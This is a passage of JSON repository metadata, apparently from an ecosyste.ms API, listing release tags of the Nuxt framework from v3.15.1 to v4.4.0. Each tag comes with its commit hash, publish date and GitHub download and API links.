","sha":"725f134d10cb5df8736324f6c42a9f651d203211","kind":"commit","published_at":"2026-03-12T11:26:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.2/manifests"},{"name":"v4.4.0","sha":"31028d2e04cb83e4a59ef346e2769b4af13c9351","kind":"commit","published_at":"2026-03-12T08:28:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.0/manifests"},{"name":"v4.3.1","sha":"7f7baf669184f626fdb1da124cf1f3986831b550","kind":"commit","published_at":"2026-02-07T16:33:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.1/manifests"},{"name":"v3.21.1","sha":"5d57cf39cbcd15f7ff98d2a09f471ea1ecaa4a29","kind":"commit","published_at":"2026-02-07T16:33:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.1/manifests"},{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/